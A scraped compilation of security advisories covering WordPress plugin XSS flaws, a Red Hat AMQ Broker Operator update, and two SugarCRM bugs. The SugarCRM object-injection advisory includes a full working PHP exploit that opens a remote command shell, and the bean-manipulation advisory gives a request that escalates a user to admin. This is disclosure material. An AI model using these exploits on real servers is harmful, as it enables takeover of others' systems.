Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Arshid Easy Hide Login plugin <= 1.0.7 versions.

**Solution**

 Fixed

Update the WordPress Easy Hide Login plugin to the latest available version (at least 1.0.8).

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Easy Hide Login Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.0.8.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32505: WordPress Easy Hide Login plugin <=1.0.7 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Yoast Yoast SEO: Local plugin <= 14.8 versions.

**Solution**

 Fixed

Update the WordPress Yoast SEO: Local plugin to the latest available version (at least 14.9).

Found this useful? Thank Rafie Muhammad (Patchstack) for reporting this vulnerability. Buy a coffee ☕

Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Yoast SEO: Local Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 14.9.

**Other vulnerabilities in this plugin**

 0 present

 3 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32300: WordPress Yoast SEO: Local plugin <= 14.8 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

This is the multiarch release of the AMQ Broker 7.11.1 aligned Operator and associated container images on Red Hat Enterprise Linux 8 for the OpenShift Container Platform.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-4065: No description is available for this CVE.
* CVE-2023-4066: No description is available for this CVE.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-08-23

Updated:

2023-08-23

**RHSA-2023:4720 - Security Advisory**

*   Overview
*   Updated Images

**Synopsis**

Moderate: AMQ Broker 7.11.1.OPR.2.GA Container Images Release

**Type/Severity**

Security Advisory: Moderate

**Topic**

This is the multiarch release of the AMQ Broker 7.11.1 aligned Operator and associated container images on Red Hat Enterprise Linux 8 for the OpenShift Container Platform.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat Middleware for OpenShift provides images for many of the Red Hat Middleware products for use within the OpenShift Container Platform cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments.  

This release of the AMQ Broker 7.11.1 aligned Operator includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.  

Security Fix(es):  

*   amq-broker-operator-container: Red Hat AMQ Broker Operator: plaintext password in operator log (CVE-2023-4065)
*   activemq-broker-operator: Red Hat AMQ Broker Operator: Passwords defined in secrets shown in StatefulSet yaml (CVE-2023-4066)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.  

For information on supported configurations, see Red Hat AMQ Broker 7 Supported Configurations at https://access.redhat.com/articles/2791941

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat OpenShift Container Platform 4.12 for RHEL 8 x86\_64
*   Red Hat OpenShift Container Platform 4.11 for RHEL 8 x86\_64
*   Red Hat JBoss Middleware 1 x86\_64

**Fixes**

*   BZ - 2224630 - CVE-2023-4065 Red Hat AMQ Broker Operator: plaintext password in operator log
*   BZ - 2224677 - CVE-2023-4066 Red Hat AMQ Broker Operator: Passwords defined in secrets shown in StatefulSet yaml
*   ENTMQBR-7804 - Move json dumps for Openshift objects into Debug from INFO loglevel

**CVEs**

*   CVE-2020-24736
*   CVE-2023-1667
*   CVE-2023-2283
*   CVE-2023-2602
*   CVE-2023-2603
*   CVE-2023-4065
*   CVE-2023-4066
*   CVE-2023-27536
*   CVE-2023-28321
*   CVE-2023-28484
*   CVE-2023-29469
*   CVE-2023-32681
*   CVE-2023-34969

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://access.redhat.com/documentation/en-us/red\_hat\_amq\_broker/

**ppc64le**

amq7/amq-broker-rhel8-operator@sha256:200dabaa7d3d7ef22353e5f70e8d7b12fe36c8e7a6c39bfa518c6187d76a9f3f

**s390x**

amq7/amq-broker-rhel8-operator@sha256:f3a205691b5d9f5623a52c756825c14bc37cb1c9e8997c915293d00ff18572a6

**x86\_64**

amq7/amq-broker-rhel8-operator@sha256:9c737dd9ea0e03d26997391b7ea08c51923fdbb3bd0852f00e58d96c78c27297

amq7/amq-broker-rhel8-operator-bundle@sha256:2da4c3e7edd27833b01c2c89e815694fc5521b1fba56a56fab4c6421d550c091

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:4720: Red Hat Security Advisory: AMQ Broker 7.11.1.OPR.2.GA Container Images Release

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Easy Form team Easy Form by AYS plugin <= 1.2.0 versions.

**Solution**

 Fixed

Update the WordPress Easy Form by AYS plugin to the latest available version (at least 1.2.1).

Taihei Shimamine discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Easy Form by AYS Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.2.1.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32498: WordPress Easy Form by AYS plugin <= 1.2.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Supersoju Block Referer Spam plugin <= 1.1.9.4 versions.

**Solution**

 Fixed

Update the WordPress Block Referer Spam plugin to the latest available version (at least 1.1.9.5).

Taihei Shimamine discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Block Referer Spam Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.1.9.5.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32497: WordPress Block Referer Spam plugin <= 1.1.9.4 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Bill Minozzi Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection plugin <= 7.31 versions.

**Solution**

 Fixed

Update the WordPress StopBadBots plugin to the latest available version (at least 7.32).

Taihei Shimamine discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress StopBadBots Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 7.32.

**Other vulnerabilities in this plugin**

 0 present

 7 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32496: WordPress Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection plugin <= 7.31 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Booking Ultra Pro Booking Ultra Pro Appointments Booking Calendar Plugin <= 1.1.8 versions.

**Solution**

 Fixed

Update the WordPress Booking Ultra Pro plugin to the latest available version (at least 1.1.9).

TEAM WEBoB of BoB 11th discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Booking Ultra Pro Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.1.9.

**Other vulnerabilities in this plugin**

 1 present

 5 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32236: WordPress Booking Ultra Pro Appointments Booking Calendar Plugin plugin <= 1.1.8 - Cross Site Scripting (XSS) - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Tony Zeoli, Tony Hayes Radio Station by netmix® – Manage and play your Show Schedule in WordPress! plugin <= 2.4.0.9 versions.

**Solution**

 Fixed

Update the WordPress Radio Station plugin to the latest available version (at least 2.5.0).

Found this useful? Thank minhtuanact for reporting this vulnerability. Buy a coffee ☕

minhtuanact discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Radio Station Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.5.0.

**Other vulnerabilities in this plugin**

 1 present

 3 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-32499: WordPress Radio Station plugin <= 2.4.0.9 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

SugarCRM versions 12.2.0 and below suffer from a PHP object injection vulnerability.

    -------------------------------------------------------------------------------SugarCRM <= 12.2.0 (Docusign_GlobalSettings) PHP Object Injection Vulnerability-------------------------------------------------------------------------------[-] Software Link:https://www.sugarcrm.com[-] Affected Versions:Version 12.2.0 and prior versions.Version 12.0.2 and prior versions.Version 11.0.5 and prior versions.[-] Vulnerability Description:There is a Second-Order PHP Object Injection vulnerability which might allow maliciousadmin users to execute arbitrary PHP code on the web server (RCE) by storing maliciousserialized objects into the database.The vulnerability can be triggered by invoking the "/DocuSign/getGlobalConfig" REST APIendpoint, which is using the unserialize() PHP function with the "Docusign_GlobalSettings"parameter. This can be exploited to inject arbitrary PHP objects into the applicationscope, allowing an attacker to perform a variety of attacks.[-] Proof of Concept:https://karmainsecurity.com/pocs/CVE-2023-35810.php[Packet Storm Note: see below][-] Solution:Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.[-] Disclosure Timeline:[14/02/2023] - Vendor notified[12/04/2023] - Fixed versions released[17/06/2023] - CVE number assigned[23/08/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-35810 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:https://karmainsecurity.com/KIS-2023-07[-] Other References:https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-009/---- poc ----<?phpset_time_limit(0);error_reporting(E_ERROR);if (!extension_loaded("curl")) die("[-] cURL extension required!\n");if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");include("chain.php");function inject_pop_chain($cmd){  global $ch, $url;  $pop = new \Monolog\Handler\BufferHandler(["current", "system"], [$cmd, "level" => null]);  $pop = new \Monolog\Handler\SyslogUdpHandler($pop);  $pop = base64_encode(serialize($pop));  curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");  curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":"'.$pop.'"}');  curl_exec($ch);}list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];print "[+] Logging in with username '{$user}' and password '{$pass}'\n";$ch = curl_init();$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/oauth2/token");curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);print "[+] Launching shell\n";while(1){  print "\nsugar-shell# ";  if (($cmd = trim(fgets(STDIN))) == "exit") break;  inject_pop_chain($cmd);  curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/DocuSign/getGlobalConfig");   curl_setopt($ch, CURLOPT_POST, false);  preg_match("/(.+)/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");}// cleaningcurl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":""}');curl_exec($ch);

SugarCRM 12.2.0 PHP Object Injection

SugarCRM versions 12.2.0 suffer from a bean manipulation vulnerability that can allow for privilege escalation.

    ------------------------------------------------------------------------SugarCRM <= 12.2.0 (updateGeocodeStatus) Bean Manipulation Vulnerability------------------------------------------------------------------------[-] Software Link:https://www.sugarcrm.com[-] Affected Versions:Version 12.2.0 and prior versions.Version 12.0.2 and prior versions.Version 11.0.5 and prior versions.[-] Vulnerability Description:The vulnerability is exploitable through the "/maps/updateGeocodeStatus" REST APIendpoint. This might allow a malicious user to modify arbitrary Sugar Beans, and thatcould lead to a variety of security impacts, such as Privilege Escalation attacks bysending an HTTP request like the following:POST /rest/v11_17/maps/updateGeocodeStatus HTTP/1.1Host: sugarcrm_websiteContent-Type: application/jsonOAuth-Token: d4cd573b-3b24-44ae-8eab-6d3b525f7974Content-Length: 96Connection: close{"id":"[USER_ID]","module":"Users","fieldName":"is_admin","status":1}[-] Solution:Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.[-] Disclosure Timeline:[14/02/2023] - Vendor notified[12/04/2023] - Fixed versions released[17/06/2023] - CVE number assigned[23/08/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-35809 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-06[-] Other References:https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-007/

Tag

#web